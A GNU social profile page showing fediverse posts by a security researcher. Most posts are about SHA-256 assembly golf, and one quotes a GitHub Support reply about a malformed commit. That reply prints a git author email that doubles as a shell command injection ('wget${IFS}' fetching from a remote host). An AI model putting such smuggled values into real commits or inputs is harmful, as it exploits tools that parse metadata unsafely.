GNU social JP
  • FAQ
  • Login
GNU social JPは日本のGNU socialサーバーです。
Usage/ToS/admin/test/Pleroma FE
  • Public

    • Public
    • Network
    • Groups
    • Featured
    • Popular
    • People

Notices by Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange), page 2

  1. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 23:51:46 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • Barry Rowlingson

    @geospacedman I don't think they have one, I think they just try to send. It's a verified email address, backticks notwithstanding.

    In conversation about 7 days ago from infosec.exchange permalink
  2. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:42:34 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • Q ✨
    • samir, a distributed system

    @samir @q feel free to try and submit it yourself, just give me a shout in the greetz section :-)

    In conversation about 7 days ago from infosec.exchange permalink
  3. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:41:32 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • Q ✨
    • samir, a distributed system

    @samir @q the replied no to my cheeky request for a bug bounty, and I have shared this gem of deviousness

    In conversation about 7 days ago from gnusocial.jp permalink
  4. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:39:09 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • Q ✨
    • samir, a distributed system

    @samir @q you mean the original repository?

    Oh fuck, lol.

    In conversation about 7 days ago from infosec.exchange permalink
  5. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:28:18 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to

    I identify as a problem, apparently GitHub's today.

    In conversation about 7 days ago from gnusocial.jp permalink
  6. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:25:10 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to

    They don't seem to appreciate the humor of an email address that is also a shell command injection attempt or the time zone of -2456.

    In conversation about 7 days ago from infosec.exchange permalink
  7. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:23:02 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    • Q ✨

    @q

    Formatting may get slightly mangled here, but should be decipherable:

    GitHub Support, Jun 11, 2025, 8:17 AM UTC

    Hi Ryan,

    Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.

    $ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

    Author and committer email:

    author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>

    That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).

    Timestamps:

    1668615481 -2456

    The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.

    Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.

    In the meantime, if this commit came from an external contributor or looks unintended, we recommend:

    • Inspecting how it got into the repository

    • Rewriting history to remove it (if it was part of a PR or forced push)

    • Checking your workflow or scripts for unsafe parsing of Git metadata

    Please give this a try and update me on how it goes.

    In conversation about 7 days ago from infosec.exchange permalink

    Attachments



    1. Domain not in remote thumbnail source whitelist: daaz.com
      Seeing.in Domain Name Is Available to Buy - Domain Name Marketplace
      DaaZ, largest domain marketplace simple, easy & secure platform to buy domain names. Buy this Seeing.in Domain at best price at DaaZ.
  8. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:16:50 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:

    Apparently I actually broke GitHub. They've slanderously blamed my "malformed commits". I've asked if my support ticket is eligible for a bug bounty.

    In conversation about 7 days ago from infosec.exchange permalink

    Attachments


    1. https://media.infosec.exchange/infosec.exchange/media_attachments/files/114/663/973/394/287/942/original/5579b6fc6f4e3172.png
  9. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Saturday, 07-Jun-2025 05:56:25 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • Ype Kingma

    @KingmaYpe the score to beat is 164 bytes :-)

    In conversation about 12 days ago from gnusocial.jp permalink
  10. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Saturday, 07-Jun-2025 04:33:26 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:

    @Neur0 we both work in computer security...

    In conversation about 12 days ago from infosec.exchange permalink
  11. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Saturday, 07-Jun-2025 04:32:45 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    • 0x10f

    @0x10f Neat!

    In conversation about 12 days ago from infosec.exchange permalink
  12. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Saturday, 07-Jun-2025 04:21:03 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • John Ripley

    @jripley saving/restoring rbp and rbx actually saved bytes due to shorter opcode encodings. Those account for eight bytes, and then two bytes to clear the FPU stack, so ten bytes total.

    In conversation about 12 days ago from infosec.exchange permalink
  13. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Saturday, 07-Jun-2025 02:24:40 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    • alina?️‍??️‍⚧️?

    @alina I'm going to eventually implement the whole SHA256 algorithm. 😄

    In conversation about 12 days ago from infosec.exchange permalink
  14. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Saturday, 07-Jun-2025 02:20:37 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:

    So anyway, some people do crossword puzzles, I do assembly golf to cryptographic algorithms. This generates the 288 bytes of magic numbers for SHA2-256 in 164 bytes while still following the SysV AMD64 ABI.

    https://gist.github.com/ryancdotorg/0d1baee4f3caf055c5931ce088e1c283#file-sha2_const-s

    In conversation about 12 days ago from infosec.exchange permalink
  15. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Friday, 06-Jun-2025 16:57:39 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • Ype Kingma

    @KingmaYpe that seems very optimistic, what would that look like?

    In conversation about 12 days ago from infosec.exchange permalink
  16. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Friday, 06-Jun-2025 16:02:20 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:

    SHA2's "magic numbers" are uint32s: the fractional parts of the square roots of the first 8 primes and the fractional parts of the cube roots of the first 64 primes.

    A precomputed table is 288 bytes.

    How many bytes of x86_64 assembly would be needed to generate them?

    Reply with your estimate.

    In conversation about 12 days ago from infosec.exchange permalink
  17. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Thursday, 05-Jun-2025 16:24:17 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • galvao|galvaoetibr@bsky.social

    @galvao I do need to actually release it as a crate.

    In conversation about 13 days ago from infosec.exchange permalink
  18. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Thursday, 05-Jun-2025 07:11:25 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • galvao|galvaoetibr@bsky.social

    @galvao cargo install --path . --all-features in the cloned repo directory should work, or you can drop the binary from github somewhere in your $PATH.

    In conversation about 14 days ago from infosec.exchange permalink
  19. Embed this notice
    Jess👾 (jesstheunstill@infosec.exchange)'s status on Friday, 30-May-2025 03:33:34 JST Jess👾 Jess👾
    in reply to

    One of the times - oh yeah, somehow there was a transaction lock on the database from something else happening. So it wasn't anything I did.

    The other time ... Well, let's just say the DBAs got a plate of cookies from me the next day.

    In conversation about 20 days ago from infosec.exchange permalink Repeated by ryanc
  20. Embed this notice
    Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange)'s status on Thursday, 05-Jun-2025 05:15:37 JST Ryan Castellucci :nonbinary_flag: Ryan Castellucci :nonbinary_flag:
    in reply to
    • Kos :verified_blobcat:

    @kos freq should generally be faster since it just shoves values into a hash table rather than having to sort them first - that's why I wrote it.

    In conversation about 14 days ago from infosec.exchange permalink
  • After
  • Before

User actions

    Ryan Castellucci :nonbinary_flag:

    Ryan Castellucci :nonbinary_flag:

    Hacker. Cryptography geek. Bureaucramancer. Ex-sysadmin. Expat (US⮕UK).I'm suing the UK for more gender, please help with my legal bills: https://enby.org.ukMy continuing mission:To explore strange new platforms.To seek out new bugs and new software.To boldly shitpost where no one has shitposted before!https://justmytoots.com/@ryanc@infosec.exchange#hacker #nonbinary

    Tags
    • (None)

    Following 0

      Followers 1

      • GNU Too

      Groups 0

        Statistics

        User ID
        174285
        Member since
        20 Sep 2023
        Notices
        4904
        Daily average
        8

        Feeds

        • Atom
        • Help
        • About
        • FAQ
        • TOS
        • Privacy
        • Source
        • Version
        • Contact

        GNU social JP is a social network, courtesy of GNU social JP管理人. It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.

        Creative Commons Attribution 3.0 All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.